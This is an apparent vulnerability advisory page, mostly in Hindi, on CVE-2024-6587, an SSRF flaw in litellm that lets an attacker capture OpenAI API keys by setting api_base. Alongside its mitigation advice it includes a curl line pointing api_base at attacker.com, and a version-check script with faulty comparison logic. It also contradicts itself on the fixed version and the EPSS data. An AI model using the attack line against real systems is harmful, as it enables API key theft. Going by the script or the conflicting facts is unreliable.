प्लेटफ़ॉर्म
python
घटक
litellm
में ठीक किया गया
1.44.9
1.44.8
CVE-2024-6587 एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है जो berriai/litellm में पाई गई है। यह भेद्यता हमलावरों को अनधिकृत अनुरोध भेजने की अनुमति देती है, जिससे संभावित रूप से संवेदनशील जानकारी का खुलासा हो सकता है। यह भेद्यता litellm के संस्करण 1.38.10 और उससे पहले को प्रभावित करती है, और इसे संस्करण 1.44.8 में ठीक कर दिया गया है।
इस SSRF भेद्यता का फायदा उठाकर, एक हमलावर api_base पैरामीटर को अपने नियंत्रण वाले डोमेन पर सेट कर सकता है। जब litellm OpenAI API के लिए अनुरोध भेजता है, तो यह अनुरोध हमलावर के डोमेन के माध्यम से रूट किया जाएगा। इस प्रक्रिया में, OpenAI API कुंजी हमलावर द्वारा इंटरसेप्ट की जा सकती है। इस API कुंजी के साथ, हमलावर OpenAI सेवाओं तक अनधिकृत पहुंच प्राप्त कर सकता है, डेटा निकाल सकता है, या अन्य दुर्भावनापूर्ण गतिविधियाँ कर सकता है। यह भेद्यता विशेष रूप से गंभीर है क्योंकि यह हमलावर को OpenAI API कुंजी को उजागर करने की अनुमति देती है, जो तब विभिन्न उद्देश्यों के लिए उपयोग की जा सकती है।
CVE-2024-6587 को अभी तक KEV में शामिल नहीं किया गया है। EPSS स्कोर की जानकारी उपलब्ध नहीं है। सार्वजनिक रूप से उपलब्ध प्रूफ-ऑफ-कॉन्सेप्ट (PoC) अभी तक ज्ञात नहीं हैं, लेकिन भेद्यता की प्रकृति के कारण, इसका शोषण किया जा सकता है। यह भेद्यता 2024-09-13 को प्रकाशित हुई थी।
Applications utilizing the berriai/litellm library, particularly those integrated with OpenAI services, are at risk. Environments where the api_base parameter is not properly validated or sanitized are especially vulnerable. Shared hosting environments where multiple users might interact with the litellm application are also at increased risk.
• python / library:
import os
import subprocess
def check_litellm_version():
try:
result = subprocess.check_output(['pip', 'show', 'litellm'], stderr=subprocess.STDOUT, text=True)
version_line = [line for line in result.splitlines() if 'Version:' in line]
if version_line:
version = version_line[0].split(': ')[1].strip()
if version <= '1.9.dev0':
print(f"[!] litellm version {version} is vulnerable to CVE-2024-6587. Upgrade to 1.44.8 or later.")
else:
print("[+] litellm version is not vulnerable.")
else:
print("[!] Could not determine litellm version.")
except FileNotFoundError:
print("[!] litellm is not installed.")
check_litellm_version()• generic web:
curl -I 'http://your-litellm-app/chat/completions?api_base=http://attacker.com' | grep api_basedisclosure
patch
एक्सप्लॉइट स्थिति
EPSS
88.37% (99% शतमक)
CISA SSVC
CVSS वेक्टर
CVE-2024-6587 को कम करने के लिए, litellm को संस्करण 1.44.8 या बाद के संस्करण में तुरंत अपग्रेड करें। यदि अपग्रेड करना संभव नहीं है, तो एक अस्थायी समाधान के रूप में, आप एक वेब एप्लिकेशन फ़ायरवॉल (WAF) या प्रॉक्सी का उपयोग करके apibase पैरामीटर के लिए इनपुट को मान्य कर सकते हैं, यह सुनिश्चित करते हुए कि यह केवल अपेक्षित डोमेन पर इंगित करता है। इसके अतिरिक्त, आप litellm के कॉन्फ़िगरेशन में सख्त एक्सेस नियंत्रण लागू कर सकते हैं, यह सीमित करते हुए कि कौन apibase पैरामीटर को संशोधित कर सकता है। अपग्रेड के बाद, यह सुनिश्चित करने के लिए कि भेद्यता ठीक हो गई है, OpenAI API कुंजी के लिए अनधिकृत अनुरोधों की निगरानी करें।
litellm लाइब्रेरी को संस्करण 1.44.9 या उच्चतर में अपडेट करें। यह SSRF भेद्यता को ठीक करता है जो दुर्भावनापूर्ण उपयोगकर्ताओं को OpenAI API कुंजी को इंटरसेप्ट करने की अनुमति देता है। नवीनतम संस्करण में अपडेट करने के लिए `pip install --upgrade litellm` चलाएँ।
भेद्यता विश्लेषण और गंभीर अलर्ट सीधे आपके ईमेल में।
CVE-2024-6587 berriai/litellm में एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है जो हमलावरों को OpenAI API कुंजी को इंटरसेप्ट करने की अनुमति देती है।
यदि आप litellm के संस्करण 1.38.10 या उससे पहले का उपयोग कर रहे हैं, तो आप प्रभावित हैं।
litellm को संस्करण 1.44.8 या बाद के संस्करण में अपग्रेड करें। यदि अपग्रेड करना संभव नहीं है, तो WAF या प्रॉक्सी का उपयोग करके api_base पैरामीटर को मान्य करें।
हालांकि सार्वजनिक PoC उपलब्ध नहीं हैं, भेद्यता की प्रकृति के कारण, इसका शोषण किया जा सकता है।
अधिक जानकारी के लिए berriai/litellm भंडार पर जाएँ।
अपनी डिपेंडेंसी फ़ाइल अपलोड करें और तुरंत जानें कि यह CVE और अन्य आपको प्रभावित करती हैं या नहीं।
अपनी requirements.txt फ़ाइल अपलोड करें और तुरंत जानें कि आप प्रभावित हैं या नहीं।